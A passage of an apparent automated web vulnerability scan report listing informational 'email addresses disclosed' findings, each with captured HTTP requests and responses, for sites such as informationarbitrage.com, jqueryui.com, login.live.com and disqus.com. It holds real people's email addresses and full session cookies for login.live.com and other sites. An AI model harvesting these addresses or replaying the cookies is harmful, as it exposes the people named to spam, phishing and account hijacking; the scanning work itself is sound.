Cookie: __utmz=169606777.1296398928.1.1.utmcsr=news.ycombinator.com|utmccn=(referral)|utmcmd=referral|utmcct=/news; __utma=169606777.1419262746.1296398928.1296398928.1296398928.1; __utmc=169606777; __utmb=169606777.1.10.1296398928; __qca=P0-737707546-1296398931461; _chartbeat2=9zgu329xqu8nir6e

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
Last-Modified: Sun, 30 Jan 2011 06:32:40 GMT
X-Cache-Auto: miss
X-Robots-Tag: noindex
Cache-Control: max-age=900
Vary: Accept-Encoding
X-Tumblr-Usec: D=2189597
Content-Type: text/javascript
Date: Sun, 30 Jan 2011 14:48:43 GMT
X-Varnish: 1726560678
Age: 0
X-Cache: MISS from rack1.tumblr.com
X-Cache-Lookup: MISS from rack1.tumblr.com:80
Via: 1.1 varnish, 1.0 rack1.tumblr.com:80 (squid/2.6.STABLE6)
Connection: keep-alive
Content-Length: 457651

jsonp1296398930691({"tumblelog":{"title":"Information Arbitrage","description":"<!-- Start of StatCounter Code -->\r\n<script type=\"text\/javascript\">\r\nvar sc_project=1890207; \r\nvar sc_invisible
...[SNIP]...

26.25. http://informationarbitrage.com/api/read/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://informationarbitrage.com
Path:   /api/read/json

Issue detail

The following email addresses were disclosed in the response:

Request

GET /api/read/json?callback=jsonp1296398930686&num=50&start=200&_=1296398950686 HTTP/1.1
Host: informationarbitrage.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=169606777.1296398928.1.1.utmcsr=news.ycombinator.com|utmccn=(referral)|utmcmd=referral|utmcct=/news; __utma=169606777.1419262746.1296398928.1296398928.1296398928.1; __utmc=169606777; __utmb=169606777.1.10.1296398928; __qca=P0-737707546-1296398931461; _chartbeat2=9zgu329xqu8nir6e

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
Last-Modified: Sun, 30 Jan 2011 06:32:40 GMT
X-Cache-Auto: miss
X-Robots-Tag: noindex
Cache-Control: max-age=900
Vary: Accept-Encoding
X-Tumblr-Usec: D=1401560
Content-Type: text/javascript
Date: Sun, 30 Jan 2011 14:48:16 GMT
X-Varnish: 1726507764
Age: 0
X-Cache: MISS from rack1.tumblr.com
X-Cache-Lookup: MISS from rack1.tumblr.com:80
Via: 1.1 varnish, 1.0 rack1.tumblr.com:80 (squid/2.6.STABLE6)
Connection: keep-alive
Content-Length: 286854

jsonp1296398930686({"tumblelog":{"title":"Information Arbitrage","description":"<!-- Start of StatCounter Code -->\r\n<script type=\"text\/javascript\">\r\nvar sc_project=1890207; \r\nvar sc_invisible
...[SNIP]...
<p>EMAIL: irvin.sha@gmail.com<\/p>
...[SNIP]...
<p>EMAIL: chuff@ha80.net<\/p>
...[SNIP]...
<a href=\"mailto:elyse@monitor110.com\" target=\"_blank\">elyse@monitor110.com<\/a>
...[SNIP]...
<\/strong>, especially those focused on TMT, who have an interest in this approach and are eager to brainstorm about it. Please shoot me a note at roger@iacapitalpartners.com should you wish to chat. Fun stuff.<\/p>
...[SNIP]...

26.26. http://jqueryui.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 23:41:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

26.27. http://js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.wlxrs.com
Path:   /~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js

Issue detail

The following email address was disclosed in the response:

Request

GET /~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js HTTP/1.1
Host: js.wlxrs.com
Proxy-Connection: keep-alive
Referer: http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Oct 2010 01:59:53 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Cache-Control: public, max-age=281473221
Expires: Wed, 01 Jan 2020 08:00:00 GMT
Date: Sun, 30 Jan 2011 12:59:39 GMT
Connection: close
Content-Length: 9084

/* Copyright (C) 2010 Microsoft Corporation */g_s["b24"]="sign in";g_s["a0"]="Cancel";g_s["a1"]="Click a Windows Live ID to sign in";g_s["a2"]="Retype your password";g_s["a3"]="Sign in with a partner
...[SNIP]...
correctly.";g_s["b25"]="Other Windows Live IDs";g_s["b52"]="Sign in with a Single use code";g_s["b54"]="Sign in with a Windows Live Hotmail ID";g_s["ii19"]="Password";g_s["ii12"]="Cancel";g_s["ii3"]="example555@hotmail.com";g_s["ii2"]="Windows Live ID:";g_s["ii13"]="Sign in with enhanced security. This may slow your browser speed.";g_s["ii14"]="Use enhanced security (SSL)";g_s["ii11"]="Sign in";g_s["ii9"]="Remember my p
...[SNIP]...
sword is incorrect. Please try again.";g_s["p21"]="Forget me";g_s["o11"]="Don't remember this Windows Live ID.";g_s["o1"]="Alert symbol";g_s["012"]="Sign-in options";g_s["y23"]="Partner ID";g_s["y3"]="example555@hotmail.com";g_s["y2"]="Windows Live ID:";g_s["y4"]="Password:";g_s["y5"]="Forgot your password?";g_s["y6"]="Messenger:";g_s["y8"]="Remember me";g_s["y10"]="Cancel";g_s["y12"]="Use enhanced security (SSL)";g_s["y
...[SNIP]...
gned in";g_s["y22"]="Please type your email address in the format yourname@example.com.";g_s["y0"]="Error symbol";g_s["y1"]="Generic Federation Error Message";g_s["dd35"]="Single use code";g_s["dd5"]="example555@hotmail.com";g_s["dd4"]="Windows Live ID:";g_s["dd6"]="Enter the code";g_s["dd7"]="Request a code";g_s["dd9"]="If you request a new single use code, the previous code won't work. Are you sure you want to refresh
...[SNIP]...

26.28. http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifeinc.todayshow.com
Path:   /_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

Issue detail

The following email address was disclosed in the response:

Request

GET /_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001 HTTP/1.1
Host: lifeinc.todayshow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=184
Date: Sat, 29 Jan 2011 23:47:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137460

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Life Inc. - Good Graph Fr
...[SNIP]...
<a href="mailto:allisonlinn@msnbc.com?subject=Life Inc. story idea">
...[SNIP]...
<a href="mailto:allisonlinn@msnbc.com">
...[SNIP]...

26.29. http://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.live.com
Path:   /login.srf

Issue detail

The following email address was disclosed in the response:

Request

GET /login.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:47:54 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H24 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:46:54 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344874&id=N&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-f2f145b9-7949-4a38-9839-b8a7726474e0; path=/;version=1
X-Frame-Options: deny
Content-Length: 11332

<!-- ServerInfo: BAYIDSLGN1H24 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

26.30. https://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following email address was disclosed in the response:

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US HTTP/1.1
Host: login.live.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; xidseq=1; mktstate=S=821848180&U=&E=&P=&B=en-us; mkt1=norm=en-us; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; wla42=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 29 Jan 2011 23:12:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:11:17 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H55 V: 0
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342737&co=1&id=251248; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
Vary: Accept-Encoding
Content-Length: 13981

<!-- ServerInfo: BAYIDSLGN1H55 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

26.31. https://login.live.com/pp900/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /pp900/

Issue detail

The following email address was disclosed in the response:

Request

GET /pp900/ HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:14 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H36 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:14 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342794&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4c2d8b39-4613-4bc8-bb07-53657b3f42ca; path=/;version=1
X-Frame-Options: deny
Content-Length: 11416

<!-- ServerInfo: BAYIDSLGN1H36 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

26.32. https://login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following email address was disclosed in the response:

Request

GET /ppsecure/post.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:14 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H52 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:14 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-df41315e-45c6-4d60-b893-881795a1cb21; path=/;version=1
X-Frame-Options: deny
Content-Length: 11450

<!-- ServerInfo: BAYIDSLGN1H52 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

26.33. https://login.live.com/ppsecure/secure.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/secure.srf

Issue detail

The following email address was disclosed in the response:

Request

GET /ppsecure/secure.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:16 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H45 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:16 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342796&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-23efde8d-b534-4b63-8d36-38dc6e68d0f0; path=/;version=1
X-Frame-Options: deny
Content-Length: 11444

<!-- ServerInfo: BAYIDSLGN1H45 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

26.34. https://login.silverlight.net/resources/script/omniture/omniture.combined.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /resources/script/omniture/omniture.combined.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/script/omniture/omniture.combined.min.js HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=ezlsvr2tttmxii3pjitfng45; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 21 Dec 2010 00:19:52 GMT
Accept-Ranges: bytes
ETag: "b2459c9a4a0cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:26 GMT
Content-Length: 23800

...var s_account = "msstoslvnet"; var omniGuidPath = "://www.iis.net/omniture/analyticsid.aspx"; if (window.location.hostname.toLowerCase().indexOf("silverlight.net") == -1) { var s2 = s_account.split
...[SNIP]...
)`2'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b=s.
...[SNIP]...

26.35. http://mediacdn.disqus.com/1296297835/build/system/disqus.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1296297835/build/system/disqus.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /1296297835/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-473502224-1295482487215

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 14:47:43 GMT
Expires: Tue, 01 Mar 2011 14:47:43 GMT
Server: Apache/2.2.14 (Ubuntu)
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Vary: Accept-Encoding
X-Origin-Date: Sat, 29 Jan 2011 10:44:41 GMT
X-Origin-Expires: Mon, 28 Feb 2011 10:44:41 GMT
X-Cache-Age: 7956
Content-Type: application/javascript
Last-Modified: Sat, 29 Jan 2011 10:43:21 GMT
X-Cache: HIT from media.disqus.com
X-Cache-Lookup: HIT from media.disqus.com:3128
X-Cache: MISS from cdce-nym011-015.nym011.internap.com
X-Origin-Date: Sun, 30 Jan 2011 12:46:01 GMT
X-Origin-Expires: Tue, 01 Mar 2011 12:46:01 GMT
X-Cache-Age: 7302
X-Cache: HIT from cdce-nym011-014.nym011.internap.com
Via: 1.0 media.disqus.com:3128 (squid), 1.0 cdce-nym011-015.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-014.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive
Content-Length: 168007

var DISQUS;if(typeof DISQUS=="undefined"){throw"Can't find DISQUS"}DISQUS.dtpl=(function(){var a={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>"};a.getGuestFields=function(f){function e(g){r
...[SNIP]...
tListener)}};documentListener=c.events.add(document,"click",f)};c.Tooltip=d;c.ManualTooltip=a})(DISQUS);DISQUS.modules.tooltip=true;
/*
* The MIT License
*
* Copyright (c) 2009 Øyvind Sean Kinsey, oyvind@kinsey.no
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restricti
...[SNIP]...

26.36. http://mediacdn.disqus.com/1296297835/js/dist/lib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1296297835/js/dist/lib.js

Issue detail

The following email address was disclosed in the response:

Request

GET /1296297835/js/dist/lib.js HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://ajenglish.disqus.com/default.html?xdm_e=http%3A%2F%2Fenglish.aljazeera.net&xdm_c=default1300&xdm_p=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-473502224-1295482487215

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 14:47:47 GMT
Expires: Tue, 01 Mar 2011 14:47:47 GMT
Server: Apache/2.2.14 (Ubuntu)
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Vary: Accept-Encoding
X-Origin-Date: Sat, 29 Jan 2011 10:44:27 GMT
X-Origin-Expires: Mon, 28 Feb 2011 10:44:27 GMT
X-Cache-Age: 3495
Content-Type: application/javascript
Last-Modified: Sat, 29 Jan 2011 10:43:16 GMT
X-Cache: HIT from media.disqus.com
X-Cache-Lookup: HIT from media.disqus.com:3128
X-Cache: MISS from cdce-nym011-010.nym011.internap.com
X-Origin-Date: Sun, 30 Jan 2011 09:59:56 GMT
X-Origin-Expires: Tue, 01 Mar 2011 09:59:56 GMT
X-Cache-Age: 17271
X-Cache: HIT from cdce-nym011-010.nym011.internap.com
Via: 1.0 media.disqus.com:3128 (squid), 1.0 cdce-nym011-010.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-010.nym011.internap.com:80 (squid/2.7.STABLE7)
